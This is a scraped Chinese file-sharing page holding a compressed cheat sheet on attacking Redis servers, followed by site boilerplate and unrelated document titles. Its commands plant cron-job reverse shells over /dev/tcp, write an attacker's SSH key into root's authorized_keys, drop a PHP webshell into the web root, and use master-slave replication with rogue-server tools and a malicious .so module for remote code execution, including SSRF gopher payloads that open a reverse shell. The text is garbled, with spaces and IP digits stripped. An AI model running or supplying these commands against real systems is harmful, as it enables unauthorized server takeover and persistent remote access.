版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡介
PAGE1redis利用總結(jié)主講moonsec利用計(jì)劃任務(wù)反彈shell/Fly_hps/article/details/102690282centos成功ubuntu失敗setxx"\n*****bash-i>&/dev/tcp/13/99990>&1\n"configsetdir/var/spool/cron/configsetdbfilenamerootsaveecho-e"\n\n*/1****/bin/bash-i>&/dev/tcp//12340>&1\n\n"|redis-cli-h29-xset1
redis-cli-h29configsetdir/var/spool/cron/
redis-cli-h29configsetdbfilenameroot
redis-cli-h29save redis密鑰登錄ssh生成密鑰公鑰ssh-keygen-trsa防止亂碼導(dǎo)出key(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>key.txt導(dǎo)入內(nèi)容catkey.txt|redis-cli-h08--passpass123-xsetxxx--pass是登錄密碼無密碼可不填設(shè)置路徑configsetdir/root/.ssh設(shè)置文件名configsetdbfilenameauthorized_keys保存savessh登錄ssh-iid_rsaroot@08redis寫webshell08:6379>configsetdir/var/www/html/08:6379>configsetdbfilenameshell.php08:6379>setx"<?phpphpinfo();?>"08:6379>save利用主從復(fù)制RCE漏洞存在于4.x、5.x版本中,Redis提供了主從模式,主從模式指使用一個(gè)redis作為主機(jī),其他的作為備份機(jī),主機(jī)從機(jī)數(shù)據(jù)都是一樣的,從機(jī)只負(fù)責(zé)讀,主機(jī)只負(fù)責(zé)寫。在Reids4.x之后,通過外部拓展,可以實(shí)現(xiàn)在redis中實(shí)現(xiàn)一個(gè)新的Redis命令,構(gòu)造惡意.so文件。在兩個(gè)Redis實(shí)例設(shè)置主從模式的時(shí)候,Redis的主機(jī)實(shí)例可以通過FULLRESYNC同步文件到從機(jī)上。然后在從機(jī)上加載惡意so文件,即可執(zhí)行命令。受害人就是從機(jī)so文件攻擊者就是主機(jī)so文件工具下載/n0b0dyCN/redis-rogue-server/Testzero-wz/Awsome-Redis-Rogue-Serverpython3redis-rogue-server.py--rhost09--lhost45反彈shell監(jiān)聽端口nc-lvnp9999如果遇上帶密碼的改一下腳本就可以了。ssrfredis反彈shellgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquitgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%252019%252021000%250d%250aquit導(dǎo)入模塊gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250amodule%2520load%2520./exp.so%250d%250aquit關(guān)閉主從gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aslaveof%2520NO%2520ONE%250d%250aquit設(shè)置數(shù)據(jù)庫名gopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520dump.rdb%250d%250aquit反彈shellgopher://:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250asystem.rev%252019%25206666%250d%250aquit本地redis主從復(fù)制RCE反彈shellkali命令nc-lvnp2333python3redis_rogue_server.py-v-pathexp.soubuntu上操作configsetdir/tmpconfigsetdbfilenameexp.soslaveof1921000moduleload./exp.soslaveofNOONEsystem.rev192333
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 醫(yī)用DNA及RNA測試設(shè)備產(chǎn)業(yè)鏈招商引資的調(diào)研報(bào)告
- 伺服放大器產(chǎn)品供應(yīng)鏈分析
- 自動(dòng)計(jì)量器細(xì)分市場深度研究報(bào)告
- 樂器用電子練習(xí)弱音器產(chǎn)業(yè)鏈招商引資的調(diào)研報(bào)告
- NFT藝術(shù)收藏與交易行業(yè)相關(guān)項(xiàng)目經(jīng)營管理報(bào)告
- 《校園食品安全整改報(bào)告模板》
- 教學(xué)檔案管理與建設(shè)計(jì)劃
- 多元智能發(fā)展課程計(jì)劃
- 如何在變革中保持年度目標(biāo)不變計(jì)劃
- 數(shù)藝交融:理論視角-探索數(shù)學(xué)在藝術(shù)創(chuàng)作中的應(yīng)用
- 客戶投訴案例及處理技巧課件
- 五年級(jí)上冊(cè)語文基于標(biāo)準(zhǔn)的教學(xué)設(shè)計(jì)第五單元
- 初中體育 田徑作業(yè)的有效設(shè)計(jì)
- 慢性阻塞性肺病疾病護(hù)理計(jì)劃單
- 顳下頜關(guān)節(jié)盤復(fù)位固定術(shù)后護(hù)理查房
- 記敘文閱讀常見題型及答題技巧
- 歷年北京市中小學(xué)生天文觀測競賽-天文知識(shí)-小學(xué)組
- 中南大學(xué)新能源與儲(chǔ)能工程培養(yǎng)方案
- 2022年長江產(chǎn)業(yè)投資集團(tuán)限公司招聘【150人】上岸筆試歷年難、易錯(cuò)點(diǎn)考題附帶參考答案與詳解
- 希特勒演講稿
- 珍珠22控制箱說明書
評(píng)論
0/150
提交評(píng)論